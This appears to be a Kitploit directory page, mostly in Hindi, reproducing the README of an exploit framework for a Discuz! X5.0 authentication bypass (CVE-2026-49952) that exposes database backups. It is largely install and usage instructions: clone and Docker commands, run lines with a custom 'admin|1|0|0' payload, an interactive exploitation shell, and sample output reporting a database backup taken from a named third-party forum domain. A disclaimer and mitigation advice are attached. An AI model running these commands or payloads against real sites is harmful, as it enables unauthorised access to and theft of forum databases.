Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - गंभीर भेद्यता जो UC_KEY एन्क्रिप्शन ओरेकल टोकन पुन: उपयोग के माध्यम से बिना प्रमाणीकरण के डेटाबेस बैकअप तक पहुंच की अनुमति देती है। CVSS 9.1। संस्करण का पता लगाने, मल्टी-पेलोड हमलों, इंटरैक्टिव शेल और स्वचालित एक्सप्लॉइटेशन के साथ पूर्ण सुविधाओं वाला टूल। केवल अधिकृत परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
प्रमाणीकरण और प्राधिकरणशोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubcerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

रिपॉजिटरी देखें
121 महीना पहलेअभी तक समीक्षित नहीं

विवरण

Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - गंभीर भेद्यता जो UC_KEY एन्क्रिप्शन ओरेकल टोकन पुन: उपयोग के माध्यम से बिना प्रमाणीकरण के डेटाबेस बैकअप तक पहुंच की अनुमति देती है। CVSS 9.1। संस्करण का पता लगाने, मल्टी-पेलोड हमलों, इंटरैक्टिव शेल और स्वचालित एक्सप्लॉइटेशन के साथ पूर्ण सुविधाओं वाला टूल। केवल अधिकृत परीक्षण के लिए।

साझा करें

Discuz! X5.0 Authentication Bypass Exploit Framework

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (गंभीर ) | संस्करण 1.0.0

Discuz! X5.0 में गंभीर प्रमाणीकरण बायपास भेद्यता की पहचान करने और उसे प्रदर्शित करने के लिए डिज़ाइन किया गया एक पेशेवर पेनिट्रेशन परीक्षण उपकरण।

D1

📋 विषय-सूची

  • ⚠️ अस्वीकरण

  • 🔍 अवलोकन

  • 🎯 भेद्यता विवरण

  • ✨ विशेषताएँ

  • 📦 स्थापना

  • 🚀 त्वरित आरंभ

  • 💻 उपयोग उदाहरण

  • 🖥️ इंटरैक्टिव शेल

  • 🛡️ सुरक्षा संबंधी विचार

  • 🔧 समस्या निवारण

  • 📄 लाइसेंस


⚠️ अस्वीकरण

महत्वपूर्ण सूचनायह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।इस उपकरण का उपयोग ऐसी प्रणालियों पर न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध और अनैतिक है।लेखक इस उपकरण से होने वाले किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।इस उपकरण का उपयोग करके, आप सभी लागू कानूनों और विनियमों का पालन करने के लिए सहमत होते हैं।


🔍 अवलोकन

Discuz! X5.0 Authentication Bypass Exploit Framework 20 मार्च 2026 और 1 मई 2026 के बीच जारी Discuz! X5.0 संस्करणों में गंभीर प्रमाणीकरण बायपास भेद्यता (CVE-2026-49952) की पहचान करने और उसे प्रदर्शित करने के लिए डिज़ाइन किया गया है।

यह भेद्यता अनप्रमाणित हमलावरों को टोकन पुन: उपयोग के लिए UC_KEY एन्क्रिप्शन ओरेकल का शोषण करके डेटाबेस बैकअप कार्यक्षमता (dbbak.php) तक पहुँचने की अनुमति देती है, जिससे संवेदनशील डेटाबेस सामग्री उजागर हो सकती है।

मुख्य बिंदु

  • 🏆 CVSS स्कोर: 9.1 (गंभीर)

  • 🔐 प्रभाव: प्रमाणीकरण बायपास

  • 📂 पहुँच: डेटाबेस बैकअप फ़ाइलें

  • ⚡ जटिलता: निम्न (शोषण करना आसान)

  • 🎯 लक्ष्य: Discuz! X5.0 (20260320 - 20260501)


🎯 भेद्यता विवरण

तकनीकी सारांश

मूल कारण

यह भेद्यता dbbak.php एंडपॉइंट में मौजूद है, जहाँ टोकन सत्यापन तंत्र UC_KEY एन्क्रिप्शन ओरेकल पर निर्भर करता है। लॉगिन अनुरोध (member.php) में एक विशिष्ट पेलोड तैयार करके, एक हमलावर एक वैध प्रमाणीकरण टोकन प्राप्त कर सकता है, जिसे उचित प्राधिकरण के बिना डेटाबेस बैकअप कार्यक्षमता तक पहुँचने के लिए पुन: उपयोग किया जा सकता है।

प्रभावित संस्करण

  • ❌ Discuz! X5.0 (20260320 - 20260501) - असुरक्षित

  • ✅ Discuz! X5.0 (20260510+) - पैच किया गया


✨ विशेषताएँ

मुख्य विशेषताएँ

  • 🔍 संस्करण पहचान: स्वचालित फिंगरप्रिंटिंग और Discuz! संस्करण की पहचान।

  • ⚡ मल्टी-पेलोड हमला: कई पेलोड वेरिएंट का समानांतर परीक्षण।

  • 🖥️ इंटरैक्टिव शेल: मैन्युअल शोषण के लिए पूर्ण-विशेषताओं वाला कमांड-लाइन इंटरफ़ेस।

  • 🚀 स्वचालित शोषण: न्यूनतम कॉन्फ़िगरेशन के साथ एक-क्लिक शोषण।

  • 📊 परिणाम सहेजना: शोषण परिणामों को टाइमस्टैम्प्ड फ़ाइलों में निर्यात करें।

  • 🌐 प्रॉक्सी समर्थन: नेटवर्क ट्रैवर्सल के लिए HTTP/HTTPS प्रॉक्सी कॉन्फ़िगरेशन।

  • 🎯 थ्रेडेड स्कैनिंग: प्रदर्शन अनुकूलन के लिए कॉन्फ़िगर करने योग्य थ्रेड संख्या।

  • 🎨 रंगीन आउटपुट: पेशेवर रंग-कोडित टर्मिनल आउटपुट।

उन्नत विशेषताएँ

  • 🔐 SSL/TLS समर्थन: HTTP और HTTPS दोनों लक्ष्यों को संभालता है।

  • 🔄 सत्र प्रबंधन: स्थायी सत्र स्थिति बनाए रखता है।

  • 📦 पेलोड अनुकूलन: कस्टम पेलोड इंजेक्शन के लिए समर्थन।

  • 🎯 लक्ष्य सत्यापन: शोषण से पहले Discuz! इंस्टॉलेशन की पुष्टि करता है।


📦 स्थापना

पूर्वापेक्षाएँ

  • Python: संस्करण 3.7 या उससे अधिक

  • Pip: Python पैकेज मैनेजर

स्रोत से स्थापित करें

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Docker से स्थापित करें

root@kitploit:~
# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 त्वरित आरंभ

बुनियादी उपयोग

root@kitploit:~
# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

उन्नत उपयोग

root@kitploit:~
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 उपयोग उदाहरण

उदाहरण 1: बुनियादी शोषण

root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
📤 अपेक्षित आउटपुट
root@kitploit:~
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ इंटरैक्टिव शेल

मैन्युअल शोषण के लिए इंटरैक्टिव शेल प्रारंभ करें:

root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive

उपलब्ध कमांड


🛡️ सुरक्षा संबंधी विचार

✅ करें

  • केवल उन प्रणालियों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।

  • परीक्षण से पहले लिखित प्राधिकरण प्राप्त करें।

  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें।

  • भेद्यताओं की सूचना विक्रेताओं को उचित रूप से दें।

  • सीखने के लिए पृथक प्रयोगशाला वातावरण में उपयोग करें।

❌ न करें

  • बिना प्राधिकरण के प्रोडक्शन सिस्टम के विरुद्ध कभी उपयोग न करें।

  • शोषित डेटा को सार्वजनिक रूप से साझा न करें।

  • अवैध गतिविधियों या डेटा चोरी के लिए कभी उपयोग न करें।

  • परीक्षण के दौरान डेटा को संशोधित या हटाएँ न करें।

  • सहमति के बिना कभी शोषण न करें।

शमन अनुशंसाएँ

सिस्टम प्रशासकों के लिए:

  1. तुरंत अपडेट करें: Discuz! X5.0 (20260510+) या उसके बाद के संस्करण में अपग्रेड करें।

  2. एंडपॉइंट अक्षम करें: यदि आवश्यक न हो तो dbbak.php को अस्थायी रूप से अक्षम करें।

  3. लॉग की निगरानी करें: संदिग्ध member.php और dbbak.php एक्सेस पर नज़र रखें।

  4. WAF नियम: दुर्भावनापूर्ण अनुरोधों को ब्लॉक करने के लिए वेब एप्लिकेशन फ़ायरवॉल नियम लागू करें।

  5. IP व्हाइटलिस्टिंग: बैकअप एंडपॉइंट एक्सेस को विश्वसनीय IP तक सीमित करें।


🔧 समस्या निवारण

❌ कनेक्शन त्रुटियाँ
root@kitploit:~
Error: Failed to connect to target

Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
🚫 प्रमाणीकरण विफल
root@kitploit:~
Error: Authentication failed or invalid authcode

Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।

कॉपीराइट © 2026 Sudeepa Wanigarathna

इसके द्वारा, इस सॉफ़्टवेयर और संबंधित दस्तावेज़ फ़ाइलों ("सॉफ़्टवेयर") की एक प्रति प्राप्त करने वाले किसी भी व्यक्ति को, बिना किसी प्रतिबंध के सॉफ़्टवेयर से निपटने की अनुमति निःशुल्क प्रदान की जाती है, जिसमें बिना किसी सीमा के सॉफ़्टवेयर की प्रतियों का उपयोग, प्रतिलिपि, संशोधन, विलय, प्रकाशन, वितरण, उप-लाइसेंस और/या बेचने के अधिकार शामिल हैं, तथा जिन व्यक्तियों को सॉफ़्टवेयर प्रदान किया जाता है, उन्हें निम्नलिखित शर्तों के अधीन ऐसा करने की अनुमति दी जाती है:

उपरोक्त कॉपीराइट सूचना और यह अनुमति सूचना सॉफ़्टवेयर की सभी प्रतियों या महत्वपूर्ण भागों में शामिल की जाएँगी।

सॉफ़्टवेयर "जैसा है" (AS IS) प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के, व्यक्त या निहित, जिसमें व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और गैर-उल्लंघन की वारंटी शामिल है लेकिन इन्हीं तक सीमित नहीं है। किसी भी स्थिति में लेखक या कॉपीराइट धारक किसी भी दावे, क्षति या अन्य दायित्व के लिए उत्तरदायी नहीं होंगे, चाहे वह अनुबंध की कार्रवाई, टोर्ट या अन्यथा में हो, जो सॉफ़्टवेयर से या सॉफ़्टवेयर के उपयोग या अन्य व्यवहार से उत्पन्न हो या उससे संबंधित हो।


लेखक: Sudeepa Wanigarathna | GitHub: @CerberusMrXi

⭐ यदि आपको यह उपकरण उपयोगी लगे, तो कृपया इसे एक स्टार देने पर विचार करें!

🔐 जिम्मेदारी से उपयोग करें। नैतिक बने रहें। सीखते रहें।

टूल डाउनलोड करें
गुणविवरण
भेद्यता प्रकारप्रमाणीकरण बायपास
CVE IDCVE-2026-49952
CVSS संस्करण3.1
CVSS स्कोर9.1 (गंभीर)
हमला वेक्टरनेटवर्क
हमले की जटिलतानिम्न
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
गोपनीयता प्रभावउच्च
अखंडता प्रभावउच्च
उपलब्धता प्रभावउच्च
एक्सप्लॉइट कोड परिपक्वताकार्यात्मक
उपचार स्तरआधिकारिक फिक्स उपलब्ध
कमांडविवरणउदाहरण
helpसभी उपलब्ध कमांड दिखाएँhelp
scanDiscuz! संस्करण का पता लगाएँ और भेद्यता जाँचेंscan
get [payload]ऑथकोड निकालें (वैकल्पिक कस्टम पेलोड )`get admin
exploit [op]एक्सप्लॉइट निष्पादित करें (डिफ़ॉल्ट: बैकअप)exploit backup
saveपरिणाम फ़ाइल में सहेजेंsave
infoसत्र जानकारी प्रदर्शित करेंinfo
clearटर्मिनल स्क्रीन साफ़ करेंclear
exit / quitइंटरैक्टिव शेल से बाहर निकलेंexit